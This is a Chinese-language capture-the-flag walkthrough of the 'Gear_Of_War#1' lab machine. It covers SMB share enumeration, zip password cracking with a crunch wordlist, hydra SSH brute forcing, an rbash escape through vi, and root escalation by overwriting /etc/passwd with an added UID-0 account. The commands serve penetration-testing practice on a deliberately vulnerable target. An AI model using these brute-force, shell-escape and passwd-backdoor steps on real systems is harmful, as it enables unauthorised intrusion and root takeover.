Gear_Of_War#1靶机渗透实战
image.png
1、信息收集
image.png
先探测smb服务
enum4linux -S 192.168.56.101
image.png
发现靶机开启了该共享 //192.168.56.101/LOCUS_LAN$
smbclient连接进入
smbclient --user=share //192.168.56.101/LOCUS_LAN$
image.png
发现两个可疑文件,直接down下来
查看SOS
image.png
目标--寻找该密码文件,很明显就是该压缩包文件
image.png
当前暂时无法获取到解压密码,按照提示,密码应该是包含着一个文件file中
进行web端信息收集,点击Join the War后进入另一张图片,直接右键源码查看
image.png
找到了第一个flag:KESXO5BAONYCUID6OUQHI7DUEN3HI7LSFJISAQCDEBITAY2RBI======
并得到一堆乱码的东西
image.png
开始扫下目录,robots下提示四个路径
/marcus.html
/dom.html
/cole.html
/baird.html
/acarmine.html
image.png
每个路径都是一张图,右键源码后,每个图都由一个注释信息
2、字典生成
通过google了解到,原来[@%%,]在密码学中具有特殊含义
@ 代表小写字母
% 代表数字
, 代表大写字母
^ 代表特殊符号
因此我们判断出该密码应该是有四位字符组成[小写字母、数字、数字、大写字母]
所有进行crunch字典生成
crunch 4 4 -o passwd -t @%%,
参数解释
-t 指定密码生成格式
image.png
image.png
3、爆破
通过上述的字典对压缩hash进行爆破
fcrackzip -D -p passwd -u msg_horda.zip
image.png
破解成功,密码为 r44M
立刻解压得到key.txt
image.png
"Vamos a atacar a los humanos con toda nuestras hordas,
por eso puse en prision a el hombre mas peligroso que tenian,
por lo que sin el son debiles."
[[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]]
-General RAAM.
继续看不懂
但 3_d4y 很像是密码,因此按照上述思路,根据端口扫描后,靶机开放了22的ssh端口,不妨再次爆破
根据上述的信息收集,将所有搜集到的人名写入用户名字典中
Delta Team
Hoffman
Vamos
General RAAM
marcus
dom
cole
baird
acarmine
直接上hydra爆破
hydra -L ssh-passwd -p 3_d4y ssh://192.168.56.101
image.png
爆破成功,口令为:login: marcus password: 3_d4y
直接登录ssh
image.png
随意几个命令就能发现,又是一个rbash的shell
image.png
系统又是挺新的,无法提权
4、rbash逃逸
进入vi,指令模式,设置系统变量
set shell=/bin/sh
shell
image.png
逃逸成功
5、提权
查看下可执行的命令后者二进制文件
find / -perm -4000 2> /dev/null
image.png
当前的环境下可以执行cp和su、sudo权限,即可进行伪造、覆盖passwd文件进行su提权
生成一个伪造的hacker用户,指定root权限,写入到passwd中进行提权
openssl passwd -1 -salt hack hack
image.png
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:marcus:/home/marcus:/bin/rbash
hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0:root:/root:/bin/bash
cp复制到/etc/目录下,直接覆盖
su hack
image.png
提权成功
在root目录下,直接cat .flag.txt 即可
image.png
6、总结
该靶机的难点在于:
1、收集到密码特殊字符分别是@ 代表小写字母,% 代表数字,, 代表大写字母,^ 代表特殊符号
通过特殊字符的含义,生成指定的密码进行爆破
2、rbash逃逸、提权
网友评论